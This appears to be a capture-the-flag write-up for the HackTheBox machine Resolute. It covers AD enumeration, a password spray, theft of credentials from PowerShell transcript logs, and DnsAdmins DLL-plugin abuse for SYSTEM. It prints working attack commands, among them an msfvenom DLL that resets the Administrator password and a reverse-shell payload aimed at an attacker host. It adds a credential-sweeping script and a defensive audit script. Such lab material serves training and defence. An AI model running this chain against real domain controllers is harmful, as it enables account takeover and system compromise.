HackTheBox Resolute

Writeup for HackTheBox Resolute

Machine Synopsis

Resolute is an easy difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT AUTHORITY\SYSTEM. (Source)

Key exploitation techniques:

  • Active Directory anonymous LDAP bind for information disclosure
  • Password spray for valid credentials
  • WinRM for initial user access
  • PowerShell transcript log analysis for credential discovery
  • Lateral movement
  • DnsAdmins group abuse for arbitrary DLL loading and RCE

Enumeration

❯ nmap -p- --min-rate 10000 10.10.10.169

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown
49688/tcp open  unknown
49713/tcp open  unknown
63433/tcp open  unknown

❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49713,63433 -sC -sV 10.10.10.169

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 01:49:47Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49680/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open   msrpc        Microsoft Windows RPC
49688/tcp open   msrpc        Microsoft Windows RPC
49713/tcp open   msrpc        Microsoft Windows RPC
63433/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

The combination of DNS (53), Kerberos (88), kpasswd (464), LDAP and Global Catalog (389/636/3268/3269) and ADWS (9389) identifies RESOLUTE as the domain controller for megabank.local, running Windows Server 2016. WinRM on 5985 gives a remote management path once credentials are found. Port 63433 was open in the first sweep and closed by the second, consistent with a short-lived ephemeral port rather than a listening service. megabank.local was added to /etc/hosts.

echo -e '10.10.10.169\tmegabank.local' | sudo tee -a /etc/hosts

rpcclient was used with a null session to enumerate domain users, revealing a list of potential usernames.

❯ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
...
user:[marko] rid:[0x457]
...

rpcclient $> queryuser marko
    User Name   :   marko
    Full Name   :   Marko Novak
    ...
    Description :   Account created. Password set to Welcome123!
    ...

The queryuser marko command revealed a password in the account’s Description field: Welcome123!. The description attribute is readable over a null session, and help-desk staff often record an initial password there when creating accounts. Although marko’s own account no longer accepted this password, it was a strong candidate for a password spray: a standard onboarding password tends to survive on other accounts created in the same batch.

All enumerated users were saved to users.txt. kerbrute was used to confirm which of them actually exist: it sends one AS-REQ per name and reads the KDC error, so it does not count against the bad-password lockout threshold.

❯ kerbrute -domain megabank.local -users users.txt -dc-ip 10.10.10.169
...
[*] Valid user => Administrator
...
[*] Valid user => ryan
...
[*] Valid user => melanie
...

impacket-GetNPUsers was used to check for users with UF_DONT_REQUIRE_PREAUTH set (AS-REP roasting), but none were found.

Exploitation

Password Spray & Initial Access (melanie)

A password spray was performed using nxc with the discovered password Welcome123! against the list of valid users. One password against many accounts is the safe direction, since it costs each account at most one bad-password count. Before spraying in a real environment, check the domain lockout threshold and observation window (nxc prints them with --pass-pol) so the spray stays below it.

❯ nxc smb megabank.local -u users.txt -p Welcome123! --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
...
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!

The password Welcome123! was valid for melanie. evil-winrm was used to gain a shell as melanie.

❯ evil-winrm -i 10.10.10.169 -P 5985 -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
1c3161947f44efe99fc0caf2175edcf5

The user.txt flag was retrieved.

Privilege Escalation

PowerShell Transcript Log & Lateral Movement (ryan)

Enumeration of users in C:\Users\ revealed ryan.

*Evil-WinRM* PS C:\Users\melanie\Desktop> cd C:\Users
*Evil-WinRM* PS C:\Users> ls
...
d-----        9/27/2019   7:05 AM                ryan
...

A hidden directory PSTranscripts was found in C:\ using dir -force. This directory contained PowerShell transcript logs: when the "Turn on PowerShell Transcription" policy is enabled, every command and its output for each session is written to a text file under the configured output directory, including any secret typed on the command line.

*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> dir -force
...
d--h--        12/3/2019   6:32 AM                PSTranscripts
...
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt file was downloaded and reviewed. It contained a command with plaintext credentials: the transcript recorded the parameter binding of Invoke-Expression, so the whole cmd /c net use line, password included, was written to disk.

cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
...

The password for ryan was Serv3r4Admin4cc123!. Lateral movement to ryan was achieved via evil-winrm.

❯ evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'
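As an added example (not part of the original writeup), the following PowerShell function sweeps a transcript directory for the kind of line that leaked ryan's password above. It is meant to run inside the evil-winrm session, or on any host with transcription turned on, as an attacker looking for more credentials or a defender checking what has been written to disk. The default root C:\PSTranscripts and the credential patterns are assumptions; the registry key it consults is the one the transcription policy writes.

```powershell
# Added example, not from the original writeup: sweep PowerShell transcript
# logs for commands that carried a secret on the command line, the way the
# "net use ... ryan Serv3r4Admin4cc123!" line leaked ryan's password.
function Find-TranscriptCredentials {
    [CmdletBinding()]
    param(
        # Transcript root. C:\PSTranscripts is where this box keeps them; if
        # the transcription policy key below is present, its OutputDirectory
        # wins over this default.
        [string]$Root = 'C:\PSTranscripts'
    )

    # "Turn on PowerShell Transcription" (GPO) stores its settings here.
    $policy     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
    $configured = (Get-ItemProperty -Path $policy -ErrorAction SilentlyContinue).OutputDirectory
    if ($configured) { $Root = $configured }

    # Patterns that usually mean a secret was typed inline. This list is an
    # assumption about common habits, not an exhaustive catalogue.
    $patterns = @(
        'net\s+use\s+\S+\s+\\\\\S+\s+\S+',          # net use X: \\srv\share [user] password
        'net\s+user\s+\S+\s+\S+',                  # net user name password [/add|/domain]
        '/user:\S+',                               # runas ... /user:, net use ... /user:
        '-(Password|Pass|Pwd|Credential)\s+\S+',   # cmdlet parameters passed in clear
        'ConvertTo-SecureString\s+.*-AsPlainText', # plaintext wrapped into a SecureString
        'PSCredential\s*\(',                       # New-Object PSCredential(user, pw)
        'password\s*[=:]\s*\S+'                    # password=... / password: ...
    )
    $regex = $patterns -join '|'

    # -Force is required: on this box the directory is hidden (d--h--) and the
    # transcript files carry the hidden attribute too (-arh--).
    Get-ChildItem -Path $Root -Recurse -Force -File -Filter 'PowerShell_transcript*.txt' -ErrorAction SilentlyContinue |
        Select-String -Pattern $regex |
        ForEach-Object {
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                Command = $_.Line.Trim()
            }
        }
}

Find-TranscriptCredentials | Format-Table -AutoSize -Wrap
```

Every hit comes back as an object with the file, line number and command text. Treat each one as a candidate to read in context: a pattern such as net user also matches harmless account queries, so the output is a shortlist, not a verdict.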

On ryan’s desktop, note.txt indicated a 1-minute auto-revert for system changes, with changes to the administrator account explicitly excluded. That exception shapes the escalation: a payload that alters the Administrator account survives the revert, whereas other persistence would be undone.

*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

whoami /groups revealed ryan was a member of the DnsAdmins group.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------
...
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
...

DnsAdmins Group Abuse (SYSTEM)

The DNS Server service reads the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters at start-up and loads the DLL it names, and it runs as NT AUTHORITY\SYSTEM. Members of DnsAdmins can set that value through dnscmd, and the path may be a UNC share, so no write access to the DC’s disk is needed. This is a well-known escalation from DnsAdmins to SYSTEM on a domain controller.

A malicious DLL payload was generated using msfvenom to reset the Administrator password, the one change the note says is not reverted. The payload runs from DllMain; because a plain msfvenom DLL does not export the plugin entry points the service expects, the DNS Server service is likely to fail to finish starting after the payload has run, so expect name resolution on the DC to be disrupted until the value is cleared.

❯ msfvenom -p windows/x64/exec cmd='net user administrator P@ssw0rd /domain' -f dll > hehe.dll

(Alternatively, for a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.xx.xx LPORT=443 -f dll -o rev.dll)

An SMB server was set up on the attacking machine to host the malicious DLL. The DC fetches the file itself, so the share must allow unauthenticated access, which impacket-smbserver does by default. Its -smb2support option is needed when the target has SMBv1 disabled; the scan shows SMBv1 enabled here, so the plain form works.

❯ impacket-smbserver share ./

From the ryan shell, dnscmd was used to set ServerLevelPluginDll to the UNC path of the malicious DLL, which the service loads the next time it starts.

*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.16.4\share\hehe.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

The DNS service was then manually stopped and started to trigger DLL loading. This step needs stop/start rights on the DNS service, which DnsAdmins membership does not grant by itself; ryan had them on this box, as the successful sc.exe calls show. Without them, the attacker would have to wait for a reboot or a scheduled restart.

*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
...
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
...

The Administrator password was successfully reset to P@ssw0rd. Final login as Administrator via evil-winrm confirmed full system compromise.

❯ evil-winrm -i 10.10.10.169 -P 5985 -u administrator -p 'P@ssw0rd'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
60d344a054c92723949cf2b4c775449c

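As an added example (not from the original writeup), here is a PowerShell function to run from an elevated session on the DNS server, either to clean up after this chain or as a periodic audit. It reads the same registry value that dnscmd set above, lists every nested member of DnsAdmins, records the DNS service’s security descriptor so you can see who may stop and start it, and can remove a plugin registration. Get-ADGroupMember comes from the ActiveDirectory module that a DC has installed; the group name DnsAdmins is the default and is assumed here.

```powershell
# Added example, not from the original writeup: audit the facts the DnsAdmins
# technique relies on, from an elevated PowerShell on the DNS server (the DC
# here), and optionally undo the plugin registration.
function Get-DnsPluginExposure {
    [CmdletBinding()]
    param(
        # Remove a configured ServerLevelPluginDll and restart DNS so the
        # service stops loading it. Off by default: read-only audit.
        [switch]$RemovePlugin
    )

    # "dnscmd /config /serverlevelplugindll <path>" writes this value; the DNS
    # Server service reads it at start-up and loads the named DLL as SYSTEM.
    $key    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $plugin = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll

    # Who can set that value: every (nested) member of DnsAdmins. The group
    # name is the default one and is assumed here.
    $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object -ExpandProperty SamAccountName

    # Service-control rights are a separate question: DnsAdmins alone does not
    # grant stop/start on the DNS service. "sc.exe sdshow dns" prints the
    # service's security descriptor as SDDL; keep it for review.
    $sddl = (& sc.exe sdshow dns | Where-Object { $_ -match '^D:' }) -join ''

    if ($plugin -and $RemovePlugin) {
        # Deleting the value undoes what dnscmd wrote. The restart briefly
        # interrupts name resolution on this server, so schedule it.
        Remove-ItemProperty -Path $key -Name ServerLevelPluginDll
        Restart-Service -Name DNS
        $plugin = $null
    }

    [pscustomobject]@{
        ServerLevelPluginDll = $plugin
        LoadedFromUnc        = [bool]($plugin -and $plugin.StartsWith('\\'))
        DnsAdminsMembers     = $members
        DnsServiceSddl       = $sddl
    }
}

Get-DnsPluginExposure | Format-List
```

A non-empty ServerLevelPluginDll that points at a UNC path, as in this box, is the clearest sign of this abuse; a local path still deserves a look, since a DnsAdmins member with write access anywhere on the server can use it the same way. The SDDL lets you confirm whether anyone outside Administrators and SYSTEM holds the RP/WP (start/stop) rights that made the restart step possible here.
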
This post is licensed under CC BY 4.0 by the author.